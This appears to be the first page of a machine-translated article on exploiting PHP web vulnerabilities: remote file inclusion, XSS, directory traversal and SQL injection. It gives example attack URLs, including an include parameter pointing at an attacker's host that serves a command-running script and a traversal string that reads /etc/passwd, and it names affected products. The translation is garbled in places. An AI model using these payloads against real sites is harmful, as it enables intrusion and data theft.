PHP page Vulnerability analysis and related problem solving

From the current network security, we are most concerned about and contact the most Web page vulnerabilities should be ASP, in this respect, small bamboo is an expert, I have no say. However, in PHP, there are also serious security issues, but this article is not much. Here, let's talk a little bit about the PHP page related vulnerabilities.

I have done a summary of the current common PHP vulnerabilities, roughly divided into the following: Include file vulnerabilities, script command execution vulnerabilities, file leaks vulnerabilities, SQL injection vulnerabilities and so on. Of course, some of the generic techniques, such as cookie spoofing, are not discussed here, and they are also available online. So, let's just one to analyze how to exploit these vulnerabilities!

First, we'll discuss the inclusion file vulnerability. This vulnerability should be said to be PHP unique. This is due to inadequate processing of externally provided malicious data, which can allow remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with Web process privileges. Let's look at an example: suppose there is such a code in a.php:

The following is a reference fragment:

Include ($include.) /xxx.php ");

?>

In this code, $include is generally a path that has been set up, but we can construct a path by ourselves to achieve the purpose of the attack. Let's say we submit: a.php?include=http://web/b.php, this web is the space we use to attack, and of course, b.php is the code we used to attack. We can write code similar to: PassThru ("/bin/ls/etc") in b.php. In this way, you can perform some purposeful attacks. (Note: The Web server should not be able to execute PHP code, otherwise it will be a problem.) For more information, see << How to attack a common vulnerability in a PHP program >>. In this loophole, a lot of situation, for example: PayPal Store front,hotnews,mambo Open source,phpdig,yabb Se,phpbb,invisionboard,solmetra Spaw Editor,les Visiteurs,phpgedview,x-cart Wait a few.

Next, let's take a look at the script command execution vulnerability. This is due to the lack of adequate filtering of the URI parameters submitted to the user, and the submission of data containing malicious HTML code that can lead to a cross-site scripting attack and potentially sensitive information for the target user. Let us also cite an example: in php php transparent php 4.3.1 The following version of the index.php page for the phpsessid lack of adequate filtering, we can use this code to achieve the purpose of the attack: http://web/index.php ? Phpsessid= "> in script we can construct a function to get some sensitive information about the user. In this vulnerability is a little less, in addition to PHP transparent also: php-nuke,phpbb,php classifieds,phpix,ultimate PHP Board and so on.

Then we'll look at the file leak vulnerability, which is due to the lack of adequate filtering of the user submission parameters, which remote attackers can use to perform directory traversal attacks and to obtain sensitive information. Let's take the recently discovered phpMyAdmin for example. In phpMyAdmin, the export.php page does not adequately filter the user-submitted ' What ' parameters, and the remote attacker submits a multiple '. /' character, you can bypass the Web root limit and view arbitrary file information on the system with Web permissions. For example, to enter such an address: export.php?what=. /.. /.. /.. /.. /.. /etc/passwd%00 will be able to achieve the purpose of the file leak. In this respect a little bit more, there are: Myphpnuke,mcnews and so on.

Finally, we are back to the most exciting place. Think we usually in the ASP page with SQL injection how cool, before also manually injected, until the small bamboo to realize "SQL injection Gupta" (hehe), and then open to make NBSI after, we NB Alliance really pull out a piece of the sky. Has helped csdn, tycoon Forum, China Channel and other large web sites to find loopholes. (These nonsense don't say much, a bit digress ...).

1 2 3 4 Next > Full text reading tips: Try the "←→" button, turn the page more convenient Oh!